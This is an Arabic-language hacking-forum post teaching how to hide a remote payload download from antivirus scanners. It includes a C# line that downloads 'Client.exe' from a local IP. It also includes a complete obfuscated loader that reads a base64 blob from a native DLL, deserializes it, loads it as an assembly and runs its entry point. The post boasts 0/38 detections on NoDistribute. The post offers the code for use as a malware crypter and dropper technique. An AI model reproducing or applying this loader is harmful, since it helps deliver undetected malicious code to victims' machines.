16.01.2018 اخفاء WebClient وميثود DownloadData ورابط الكلاينت نهائيا من السورس


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,533
2,887
1
حياكم الله ياشباب
نزلت موضوعي هنا
تحويل الاوبجكت الى بيس64 ومن ثم ارجاع الاوبجيكت [ تشفير وتمويه السورس ]
وقلت لكم انه مهم
فحبيت اعمل شرح يبين اهميته لان اللي حكيته بالموضوع مااثار اعجاب البعض
لان التطبيق كان على دوال بسيطة ..
ان كنت بدك تجلب سترينج او بايت رح تستخدم مثلا ويب كلاينت "فيه طرق اخرى"
مثلا لنقول بدنا نعمل داونلود للبايت اراي "الكلاينت الخاص بك"
فرح تستخدم التالي
C#:
var bb = new WebClient();
byte[] cc = bb.DownloadData("http://192.168.2.100/Client.exe");
طريقتنا بالموضوع فوق اللي حكيت عنه مارح يكون بالسورس WebClient
ولا DownloadData ولا رابط الكلاينت
حبيت اعمل مزيج واستعنت بالموضوع هنا
Call String From Native Over C# [Bypass|Hide|Crypt]
والفحص للداينمك لايبري والاسمبلي كلين
Microsoft.dll | 0/38 | NoDistribute
WindowsFormsApp79.exe | 0/38 | NoDistribute
السورس هنا مثل مشايفين مافيه شي يدل على اننا قمنا بعمل ويب كلاينت
واستخدام ميثود DownloadData ولاحتى رابط التحميل موجود بالسورس



C#:
using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Runtime.Serialization.Formatters.Binary;
using Microsoft.VisualBasic;
 
namespace WindowsFormsApp79
{
    static class Program
    {
    
        [STAThread]
        static void Main()
        {
            Interaction.CallByName(Interaction.CallByName(Type.GetType("System.Reflection.Assembly")?.GetMethod("Load", new[] { typeof(byte[]) })
    ?.Invoke(null,new[] {B64ToObj(Native.Specs_GetSegmentList()) } ) ?? throw new InvalidOperationException(), "EntryPoint", CallType.Get), "Invoke", CallType.Method, 10000000 - 10000000, null);
 
        }
        static object B64ToObj(string b64)
        {
            return new BinaryFormatter().Deserialize(new MemoryStream((byte[])Type.GetType("System.Convert")?.GetMethod("FromBase64String",
            new[] { typeof(string) })?.Invoke(null, new object[] { b64 }) ?? throw new InvalidOperationException()));
        }
    }
    public static class Native
    {
        [DllImport("Microsoft.dll", EntryPoint = "_Z6hackmev")]
        public static extern IntPtr Plus();
        public static string Specs_GetSegmentList()
        {
            return Marshal.PtrToStringAnsi(Plus());
        }
    }
}
الفديو بالمرفقات
 

المرفقات

إخلاء مسؤلية

  • المنتدى غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به protection-tips غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به من بيع وشراء وإتفاق وأعطاء معلومات موقعه التعليقات المنشورة لا تعبر عن رأي معهد المنتدى ولا نتحمل أي مسؤولية قانونية حيال ذلك (ويتحمل كاتبها مسؤولية النشر).).

الإنتقال السريع

User Menu

تابعنا على الفيسبوك